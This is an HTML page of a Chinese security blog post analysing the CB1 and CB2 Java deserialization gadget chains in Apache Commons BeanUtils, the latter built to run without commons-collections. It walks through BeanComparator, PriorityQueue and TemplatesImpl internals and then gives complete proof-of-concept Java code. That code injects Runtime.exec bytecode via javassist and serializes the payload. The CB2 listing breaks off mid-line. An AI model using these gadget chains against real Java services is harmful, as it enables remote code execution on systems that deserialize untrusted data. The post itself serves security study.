<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="Okaytc" />
  <meta name="description" content="生活 健身 学习 沉淀" />
  
  
  <title>
    
      java安全-CB1&amp;CB2无依赖CC链学习与分析 
      
      
      |
    
     Okaytc
  </title>

  
    <link rel="apple-touch-icon" href="/images/head-3.jpg">
    <link rel="icon" href="/images/head-3.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/head-3.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Okaytc</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">文章</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">友链</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">java安全-CB1&CB2无依赖CC链学习与分析</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2023-03-22 16:30:00
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/Java%E5%AE%89%E5%85%A8/" title="Java安全">
                    #Java安全
                  </a>
                </span>
                
                <span class="span--tag mr-8">
                  <a href="/tags/java%E5%88%A9%E7%94%A8%E9%93%BE/" title="java利用链">
                    #java利用链
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="0x00、前言"><a href="#0x00、前言" class="headerlink" title="0x00、前言"></a>0x00、前言</h1><p>到Commons BeanUtils组件利用链分析，主要是CB1链以及CB1链无依赖CC组件形成的CB2链的分析</p>
<h1 id="0x01、CommonsBeanutils描述"><a href="#0x01、CommonsBeanutils描述" class="headerlink" title="0x01、CommonsBeanutils描述"></a>0x01、CommonsBeanutils描述</h1><p>Apache Commons BeanUtils 是一个 Java 库，作为更大的 Apache Commons 项目的一部分。它提供了一组实用方法和类，用于操作 Java Bean。Java Bean 是一种遵循特定命名约定的 Java 类，具有一组属性和访问它们的 getter 和 setter 方法。</p>
<p>Commons BeanUtils 主要功能包括：</p>
<pre><code>动态操作 Java Bean 属性：通过使用 Java 反射和内省机制，BeanUtils 允许你在运行时动态地访问和修改 Java Bean 的属性。
数据类型转换：BeanUtils 提供了一组用于在各种数据类型之间进行转换的实用方法，例如将字符串转换为整数、浮点数等。
自动填充 Java Bean：通过将一个对象的属性值复制到另一个对象，BeanUtils 可以用于自动填充 Java Bean，从而简化了数据传输对象 (DTO) 和领域模型之间的转换工作。
动态创建 Java Bean 实例：BeanUtils 提供了实例化类的方法，而无需显式地调用构造函数。
支持嵌套属性：BeanUtils 支持访问嵌套属性，这意味着你可以访问和操作一个 Bean 中的另一个 Bean 的属性。
</code></pre>
<p>Commons BeanUtils 库在许多 Java 应用程序和框架中广泛使用，例如 Apache Struts 和 Spring Framework。它可以简化代码，提高开发效率，并有助于降低维护成本。</p>
<h1 id="0x02、前置知识"><a href="#0x02、前置知识" class="headerlink" title="0x02、前置知识"></a>0x02、前置知识</h1><h2 id="templates、PriorityQueue"><a href="#templates、PriorityQueue" class="headerlink" title="templates、PriorityQueue"></a>templates、PriorityQueue</h2><p>templates字节码、PriorityQueue优先级队列的相关知识在cc2中写过了，回顾<a href="https://okaytc.github.io/posts/7e30cd4a.html">cc2</a></p>
<h2 id="BeanComparator"><a href="#BeanComparator" class="headerlink" title="BeanComparator"></a>BeanComparator</h2><p>CommonsBeanutils组件的类</p>
<p>官方定义的作用：此比较器通过指定的bean属性比较两个bean。还可以基于嵌套的、索引的、组合的、映射的bean属性来比较bean。</p>
<p>也就是Bean的比较器，其中Bean理解为通过<code>getter/setter</code>方式获取和赋值成员变量的类。</p>
<p>主要作用是通过<code>property</code>字段属性来比较bean方法中返回属性，其中会通过<code>getter/setter</code>来获取<code>property</code>属性对应的<code>get/set</code>前缀的方法，并通过反射执行</p>
<p><img src="/posts/638f8ee9/c1-3.png" title="获取属性"></p>
<p>获取<code>bean property</code>属性后，在进行<code>compare</code>比较。</p>
<h1 id="0x03、CB1分析"><a href="#0x03、CB1分析" class="headerlink" title="0x03、CB1分析"></a>0x03、CB1分析</h1><p>CB1核心就是使用CC2链，改变了触发入口点，将比较器改为了BeanComparator</p>
<h2 id="漏洞版本"><a href="#漏洞版本" class="headerlink" title="漏洞版本"></a>漏洞版本</h2><p>commons-beanutils&#x3D;1.9.2<br>commons-collections&lt;&#x3D;3.2.1</p>
<h2 id="利用环境"><a href="#利用环境" class="headerlink" title="利用环境"></a>利用环境</h2><figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;commons-beanutils&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;commons-beanutils&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;<span class="number">1.9</span><span class="number">.2</span>&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;commons-collections&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;commons-collections&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;<span class="number">3.2</span><span class="number">.1</span>&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/638f8ee9/c1-25.png" title="环境版本"></p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>核心通过<code>templates</code>加载字节码，然后设置<code>property</code>属性，通过<code>BeanComparator</code>比较器的<code>getter/setter</code>读取<code>property</code>属性并反射执行。</p>
<p>我这里是已经构造好POC执行，然后分析的流程，先分析过程，再最后构造POC。</p>
<p>跟进<code>BeanComparator</code>比较器，存在<code>property</code>、<code>comparator</code>两个成员属性，分别代表’用于比较方法的属性名’、’比较器’</p>
<p><img src="/posts/638f8ee9/c1-4.png" title="BeanComparator成员属性"></p>
<p>跟进<code>compare</code>方法，先是判断<code>property</code>属性是否存在，不存在就直接比较两个对象（这里传入的比较对象包括了<code>templates</code>对象）</p>
<p><img src="/posts/638f8ee9/c1-5.png" title="compare"></p>
<p><code>property</code>属性存在，则通过<code>getProperty</code>方法<code>getter/setter</code>获取对象<code>property</code>真实属性</p>
<p><img src="/posts/638f8ee9/c1-6.png" title="getProperty"></p>
<p>继续跟进<code>getProperty</code>查看流程，调用<code>PropertyUtilsBean.getProperty</code>,继续跟进</p>
<p><img src="/posts/638f8ee9/c1-7.png" title="PropertyUtilsBean.getProperty"></p>
<p>接着调用<code>getNestedProperty</code>进入获取嵌套<code>Property</code>属性方法</p>
<p><img src="/posts/638f8ee9/c1-8.png" title="getNestedProperty"></p>
<p>由于传入的<code>Property</code>属性为普通的属性，不属于嵌套形式，因此会跳出while循环获取嵌套内容</p>
<p><img src="/posts/638f8ee9/c1-9.png" title="getNestedProperty"></p>
<p>然后判断<code>bean</code>的属性，由于<code>bean</code>(<code>templates</code>类对象)不属于<code>map</code>，并且<code>name</code>（<code>Property</code>属性）也不属于<code>map</code>和<code>index</code>类型，最后调用<code>getSimpleProperty</code>方法获取真实属性</p>
<p><img src="/posts/638f8ee9/c1-10.png" title="getSimpleProperty"></p>
<p>跟进<code>getSimpleProperty</code>，又是同一个判断步骤，继续往下</p>
<p><img src="/posts/638f8ee9/c1-11.png" title="getSimpleProperty"></p>
<p>多了个判断判断是否是动态bean类型，不属于，进入下一个代码段</p>
<p><img src="/posts/638f8ee9/c1-12.png" title="DynaBean"></p>
<p>通过<code>getPropertyDescriptor</code>方法获取真实属性<code>Property</code></p>
<p><img src="/posts/638f8ee9/c1-13.png" title="getPropertyDescriptor"></p>
<p>跟进<code>getPropertyDescriptor</code>方法，开头又是同一个判断，直接到下面代码段</p>
<p><img src="/posts/638f8ee9/c1-14.png" title="getPropertyDescriptor"></p>
<p>通过<code>getDescriptor</code>方法<code>getter/setter</code>获取<code>name</code>在对象中的真实属性</p>
<p><img src="/posts/638f8ee9/c1-15.png" title="getDescriptor"><br><img src="/posts/638f8ee9/c1-16.png" title="getDescriptor"><br><img src="/posts/638f8ee9/c1-17.png" title="getDescriptor"></p>
<p>读取到真实方法名过后进行对对象进行方法反射调用</p>
<p><img src="/posts/638f8ee9/c1-18.png" title="invokeMethod"><br><img src="/posts/638f8ee9/c1-19.png" title="invokeMethod"></p>
<p>执行<code>templates</code>的<code>getOutputProperties</code>方法触发漏洞</p>
<p><img src="/posts/638f8ee9/c1-20.png" title="触发漏洞"></p>
<p>剩下的就是如何将<code>templates</code>对象传入<code>BeanComparator</code>构造器的步骤了，这里就是CC2后半段的一部分，在构造POC中简述</p>
<p>简述下触发流程：<br>需要构造<code>property</code>属性为<code>getOutputProperties/newTransformer()</code>方法，然后将<code>templates</code>对象传入<code>compare</code>方法作为对象进行比较，然后<code>BeanComparator</code>构造器通过<code>getter/setter</code>获取对象的真实<code>property</code>属性再进行反射执行触发漏洞</p>
<h2 id="构造POC"><a href="#构造POC" class="headerlink" title="构造POC"></a>构造POC</h2><p>首先cc2中的<code>templates</code>字节码构造没变化</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">//创建CtClass对象容器</span></span><br><span class="line">        <span class="type">ClassPool</span> <span class="variable">pool2</span> <span class="operator">=</span> ClassPool.getDefault();</span><br><span class="line">        <span class="comment">//pool2.insertClassPath(new ClassClassPath(AbstractTranslet.class));</span></span><br><span class="line">        <span class="comment">//创建新类Exp2</span></span><br><span class="line">        <span class="type">CtClass</span> <span class="variable">ct</span> <span class="operator">=</span> pool2.makeClass(<span class="string">&quot;People2&quot;</span>);</span><br><span class="line">        <span class="comment">//设置People2类的父类为AbstractTranslet，满足实例化条件</span></span><br><span class="line">        ct.setSuperclass(pool2.get(AbstractTranslet.class.getName()));</span><br><span class="line">        <span class="comment">//创建构造函数</span></span><br><span class="line">        <span class="type">CtConstructor</span> <span class="variable">cons2</span> <span class="operator">=</span> ct.makeClassInitializer();</span><br><span class="line">        <span class="comment">//向构造函数插入字节码</span></span><br><span class="line">        cons2.insertBefore(<span class="string">&quot;java.lang.Runtime.getRuntime().exec(\&quot;calc\&quot;);&quot;</span>);</span><br><span class="line">        <span class="comment">//javassist转换字节码并转化为二位数组</span></span><br><span class="line">        <span class="type">byte</span>[] bytecode = ct.toBytecode();</span><br><span class="line">        <span class="type">byte</span>[][] bytecodes = <span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytecode&#125;;</span><br><span class="line">        <span class="comment">//实例化TemplatesImpl对象</span></span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> TemplatesImpl.class.getDeclaredConstructor().newInstance();</span><br><span class="line">        <span class="comment">//设置满足条件属性_bytecodes为恶意构造字节码</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_bytecodes&quot;</span>, bytecodes);</span><br><span class="line">        <span class="comment">//设置满足条件属性_class为空</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_class&quot;</span>, <span class="literal">null</span>);</span><br><span class="line">        <span class="comment">//设置满足条件属性_name不为空，任意赋值都行</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_name&quot;</span>, <span class="string">&quot;test&quot;</span>);</span><br><span class="line">        <span class="comment">//设置满足条件属性_tfactory实例化</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_tfactory&quot;</span>, TransformerFactoryImpl.class.getDeclaredConstructor().newInstance());</span><br></pre></td></tr></table></figure>
<p>然后调用<code>BeanComparator</code>构造器，并且通过反射将<code>BeanComparator</code>构造器的<code>property</code>属性设置为<code>getOutputProperties/newTransformer()</code>方法</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">BeanComparator</span> <span class="variable">beanComparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BeanComparator</span>();</span><br><span class="line">setFieldValue(beanComparator,<span class="string">&quot;property&quot;</span>,<span class="string">&quot;outputProperties&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>接着就是cc2后半段，利用<code>PriorityQueue</code>优先级队列将<code>BeanComparator</code>构造器作为比较器，来调用<code>BeanComparator.compare</code>方法</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">//设置优先级队列对象</span></span><br><span class="line">PriorityQueue pq=<span class="keyword">new</span> <span class="title class_">PriorityQueue</span>(<span class="number">2</span>);</span><br><span class="line"><span class="comment">//设置size大小，满足大于2的条件</span></span><br><span class="line">setFieldValue(pq,<span class="string">&quot;size&quot;</span>,<span class="number">2</span>);</span><br><span class="line"><span class="comment">//设置比较器</span></span><br><span class="line">setFieldValue(pq,<span class="string">&quot;comparator&quot;</span>,beanComparator);</span><br><span class="line"><span class="comment">//设置传递的队列元素，需要将templates对象传入</span></span><br><span class="line">Object[] list=<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;templates,<span class="number">1</span>&#125;;</span><br><span class="line"><span class="comment">//向PriorityQueue队列添加元素</span></span><br><span class="line">setFieldValue(pq,<span class="string">&quot;queue&quot;</span>,list);</span><br></pre></td></tr></table></figure>
<p>原理：<br>PriorityQueue重写了反序列化步骤,调用<code>heapify()</code>;</p>
<p><img src="/posts/638f8ee9/c1-21.png" title="readObject"></p>
<p>条件要求size大于2(详情查看cc2后半段分析)，才能调用<code>siftDown</code>方法</p>
<p><img src="/posts/638f8ee9/c1-22.png" title="siftDown"></p>
<p>接着调用<code>siftDownUsingComparator</code>方法</p>
<p><img src="/posts/638f8ee9/c1-23.png" title="siftDownUsingComparator"></p>
<p>这里会调用<code>comparator.compare</code>方法，通过反射<code>setFieldValue(pq,&quot;comparator&quot;,beanComparator);</code>设置了比较器，因此会调用到<code>beanComparator.compare</code>方法进入上述分析的步骤</p>
<p><img src="/posts/638f8ee9/c1-24.png" title="comparator.compare"></p>
<h2 id="完整POC"><a href="#完整POC" class="headerlink" title="完整POC"></a>完整POC</h2><p>最后加上反序列化步骤就构成了完整的poc：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">cb1Test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="comment">//创建CtClass对象容器</span></span><br><span class="line">        <span class="type">ClassPool</span> <span class="variable">pool2</span> <span class="operator">=</span> ClassPool.getDefault();</span><br><span class="line">        <span class="comment">//pool2.insertClassPath(new ClassClassPath(AbstractTranslet.class));</span></span><br><span class="line">        <span class="comment">//创建新类Exp2</span></span><br><span class="line">        <span class="type">CtClass</span> <span class="variable">ct</span> <span class="operator">=</span> pool2.makeClass(<span class="string">&quot;People2&quot;</span>);</span><br><span class="line">        <span class="comment">//设置People2类的父类为AbstractTranslet，满足实例化条件</span></span><br><span class="line">        ct.setSuperclass(pool2.get(AbstractTranslet.class.getName()));</span><br><span class="line">        <span class="comment">//创建构造函数</span></span><br><span class="line">        <span class="type">CtConstructor</span> <span class="variable">cons2</span> <span class="operator">=</span> ct.makeClassInitializer();</span><br><span class="line">        <span class="comment">//向构造函数插入字节码</span></span><br><span class="line">        cons2.insertBefore(<span class="string">&quot;java.lang.Runtime.getRuntime().exec(\&quot;calc\&quot;);&quot;</span>);</span><br><span class="line">        <span class="comment">//javassist转换字节码并转化为二位数组</span></span><br><span class="line">        <span class="type">byte</span>[] bytecode = ct.toBytecode();</span><br><span class="line">        <span class="type">byte</span>[][] bytecodes = <span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytecode&#125;;</span><br><span class="line">        <span class="comment">//实例化TemplatesImpl对象</span></span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> TemplatesImpl.class.getDeclaredConstructor().newInstance();</span><br><span class="line">        <span class="comment">//设置满足条件属性_bytecodes为恶意构造字节码</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_bytecodes&quot;</span>, bytecodes);</span><br><span class="line">        <span class="comment">//设置满足条件属性_class为空</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_class&quot;</span>, <span class="literal">null</span>);</span><br><span class="line">        <span class="comment">//设置满足条件属性_name不为空，任意赋值都行</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_name&quot;</span>, <span class="string">&quot;test&quot;</span>);</span><br><span class="line">        <span class="comment">//设置满足条件属性_tfactory实例化</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_tfactory&quot;</span>, TransformerFactoryImpl.class.getDeclaredConstructor().newInstance());</span><br><span class="line"></span><br><span class="line">        <span class="type">BeanComparator</span> <span class="variable">beanComparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BeanComparator</span>();</span><br><span class="line">        <span class="comment">//设置getOutputProperties/newTransformer均可</span></span><br><span class="line">        setFieldValue(beanComparator,<span class="string">&quot;property&quot;</span>,<span class="string">&quot;outputProperties&quot;</span>);</span><br><span class="line">        <span class="comment">//设置优先级队列对象</span></span><br><span class="line">        PriorityQueue pq=<span class="keyword">new</span> <span class="title class_">PriorityQueue</span>(<span class="number">2</span>);</span><br><span class="line">        <span class="comment">//设置size大小，满足大于2的条件</span></span><br><span class="line">        setFieldValue(pq,<span class="string">&quot;size&quot;</span>,<span class="number">2</span>);</span><br><span class="line">        <span class="comment">//设置比较器</span></span><br><span class="line">        setFieldValue(pq,<span class="string">&quot;comparator&quot;</span>,beanComparator);</span><br><span class="line">        <span class="comment">//设置传递的队列元素，需要将templates对象传入</span></span><br><span class="line">        Object[] list=<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;templates,<span class="number">1</span>&#125;;</span><br><span class="line">        <span class="comment">//向PriorityQueue队列添加元素</span></span><br><span class="line">        setFieldValue(pq,<span class="string">&quot;queue&quot;</span>,list);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span>&#123;</span><br><span class="line">            <span class="type">ObjectOutputStream</span> <span class="variable">outputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;cb1payload.ser&quot;</span>));</span><br><span class="line">            outputStream.writeObject(pq);</span><br><span class="line">            outputStream.close();</span><br><span class="line"></span><br><span class="line">            <span class="type">ObjectInputStream</span> <span class="variable">inputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;cb1payload.ser&quot;</span>));</span><br><span class="line">            inputStream.readObject();</span><br><span class="line">            inputStream.close();</span><br><span class="line">        &#125;<span class="keyword">catch</span>(Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//通过反射给对象属性赋值，避免代码冗余繁琐</span></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setFieldValue</span><span class="params">(<span class="keyword">final</span> Object obj, <span class="keyword">final</span> String fieldName, <span class="keyword">final</span> Object value)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        field.set(obj, value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="0x04、CB2分析"><a href="#0x04、CB2分析" class="headerlink" title="0x04、CB2分析"></a>0x04、CB2分析</h1><h2 id="利用版本"><a href="#利用版本" class="headerlink" title="利用版本"></a>利用版本</h2><p>commons-beanutils&#x3D;1.9.2<br>commons-beanutils&#x3D;1.8.3</p>
<h2 id="利用环境-1"><a href="#利用环境-1" class="headerlink" title="利用环境"></a>利用环境</h2><figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;commons-beanutils&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;commons-beanutils&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;<span class="number">1.9</span><span class="number">.2</span>&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>

<h2 id="CB1依赖问题"><a href="#CB1依赖问题" class="headerlink" title="CB1依赖问题"></a>CB1依赖问题</h2><p>在CB1中，调用的BeanComparator类，是直接进行声明对象调用的</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">BeanComparator</span> <span class="variable">beanComparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BeanComparator</span>();</span><br></pre></td></tr></table></figure>
<p>该调用方式直接调用<code>BeanComparator</code>的无参构造方式，无参构造方式又会传递个null值去调用带一个参数的构造方法，该方法又会调用<code>ComparableComparator.getInstance()</code>方法去调用<code>public BeanComparator( String property, Comparator&lt;?&gt; comparator )</code>的构造方法</p>
<p><img src="/posts/638f8ee9/c1-26.png" title="BeanComparator"></p>
<p>其中调用<code>ComparableComparator.getInstance()</code>，调用的<code>ComparableComparator</code>类为<code>commons-collections</code>组件的类，意味着CB1链是依赖于CC组件的，如果目标环境不存在CC组件那么就无法使用CB1链</p>
<p><img src="/posts/638f8ee9/c1-27.png" title="ComparableComparator"></p>
<p>因此CB2链的核心变动就是<code>BeanComparator</code>类的声明方式，规避使用到<code>ComparableComparator</code>类作为<code>comparator</code>比较器，因此只需要替换一下<code>comparator</code>比较器，找一个java自带或者cb组件自带的实现了<code>comparator</code>和序列化的比较器类即可</p>
<p><img src="/posts/638f8ee9/c1-28.png" title="ComparableComparator"></p>
<h2 id="CB2分析"><a href="#CB2分析" class="headerlink" title="CB2分析"></a>CB2分析</h2><p>示例<code>AttrCompare</code>类，实现了<code>comparator</code>和序列化</p>
<p><img src="/posts/638f8ee9/c1-29.png" title="AttrCompare"></p>
<p>同时不用关注该类下面的调用方法，因为<code>BeanComparator</code>类的触发为<code>BeanComparator.compare</code>方法中<code>getter/setter</code>获取对象方法进行反射调用</p>
<p>因此只需要将上面的代码<code>BeanComparator</code>类的声明方式换成</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">BeanComparator</span> <span class="variable">beanComparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BeanComparator</span>(<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">AttrCompare</span>());</span><br></pre></td></tr></table></figure>

<p>其他条件不用变化，跟进查看执行，这里调用<code>BeanComparator</code>类会直接调用<code>BeanComparator( String property, Comparator&lt;?&gt; comparator )</code>的构造方法，赋值<code>comparator</code>后直接跳过了调用<code>ComparableComparator.getInstance()</code>的步骤</p>
<p><img src="/posts/638f8ee9/c1-30.png" title="AttrCompare"></p>
<p>再到调用compare方法</p>
<p><img src="/posts/638f8ee9/c1-31.png" title="compare"></p>
<p>后面在CB1分析过了，同样的步骤，通过<code>getter/setter</code>获取对象方法，再通过反射调用执行该方法触发漏洞</p>
<p><img src="/posts/638f8ee9/c1-32.png" title="compare"></p>
<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><p>得到的POC,<code>BeanComparator</code>构造参数的AttrCompare类换为其他实现<code>comparator</code>和序列化的无依赖组件均可</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">cb2Test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="comment">//创建CtClass对象容器</span></span><br><span class="line">        <span class="type">ClassPool</span> <span class="variable">pool2</span> <span class="operator">=</span> ClassPool.getDefault();</span><br><span class="line">        <span class="comment">//pool2.insertClassPath(new ClassClassPath(AbstractTranslet.class));</span></span><br><span class="line">        <span class="comment">//创建新类Exp2</span></span><br><span class="line">        <span class="type">CtClass</span> <span class="variable">ct</span> <span class="operator">=</span> pool2.makeClass(<span class="string">&quot;People2&quot;</span>);</span><br><span class="line">        <span class="comment">//设置People2类的父类为AbstractTranslet，满足实例化条件</span></span><br><span class="line">        ct.setSuperclass(pool2.get(AbstractTranslet.class.getName()));</span><br><span class="line">        <span class="comment">//创建构造函数</span></span><br><span class="line">        <span class="type">CtConstructor</span> <span class="variable">cons2</span> <span class="operator">=</span> ct.makeClassInitializer();</span><br><span class="line">        <span class="comment">//向构造函数插入字节码</span></span><br><span class="line">        cons2.insertBefore(<span class="string">&quot;java.lang.Runtime.getRuntime().exec(\&quot;calc\&quot;);&quot;</span>);</span><br><span class="line">        <span class="comment">//javassist转换字节码并转化为二位数组</span></span><br><span class="line">        <span class="type">byte</span>[] bytecode = ct.toBytecode();</span><br><span class="line">        <span class="type">byte</span>[][] bytecodes = <span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytecode&#125;;</span><br><span class="line">        <span class="comment">//实例化TemplatesImpl对象</span></span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> TemplatesImpl.class.getDeclaredConstructor().newInstance();</span><br><span class="line">        <span class="comment">//设置满足条件属性_bytecodes为恶意构造字节码</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_bytecodes&quot;</span>, bytecodes);</span><br><span class="line">        <span class="comment">//设置满足条件属性_class为空</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_class&quot;</span>, <span class="literal">null</span>);</span><br><span class="line">        <span class="comment">//设置满足条件属性_name不为空，任意赋值都行</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_name&quot;</span>, <span class="string">&quot;test&quot;</span>);</span><br><span class="line">        <span class="comment">//设置满足条件属性_tfactory实例化</span></span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_tfactory&quot;</span>, TransformerFactoryImpl.class.getDeclaredConstructor().newInstance());</span><br><span class="line"></span><br><span class="line">        <span class="type">BeanComparator</span> <span class="variable">beanComparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BeanComparator</span>(<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">AttrCompare</span>());</span><br><span class="line">        setFieldValue(beanComparator,<span class="string">&quot;property&quot;</span>,<span class="string">&quot;outputProperties&quot;</span>);</span><br><span class="line">        <span class="comment">//设置优先级队列对象</span></span><br><span class="line">        PriorityQueue pq=<span class="keyword">new</span> <span class="title class_">PriorityQueue</span>(<span class="number">2</span>);</span><br><span class="line">        <span class="comment">//设置size大小，满足大于2的条件</span></span><br><span class="line">        setFieldValue(pq,<span class="string">&quot;size&quot;</span>,<span class="number">2</span>);</span><br><span class="line">        <span class="comment">//设置比较器</span></span><br><span class="line">        setFieldValue(pq,<span class="string">&quot;comparator&quot;</span>,beanComparator);</span><br><span class="line">        <span class="comment">//设置传递的队列元素，需要将templates对象传入</span></span><br><span class="line">        Object[] list=<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;templates,<span class="number">1</span>&#125;;</span><br><span class="line">        <span class="comment">//向PriorityQueue队列添加元素</span></span><br><span class="line">        setFieldValue(pq,<span class="string">&quot;queue&quot;</span>,list);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span>&#123;</span><br><span class="line">            <span class="type">ObjectOutputStream</span> <span class="variable">outputStream</span> <span class="operator">=</span> <span 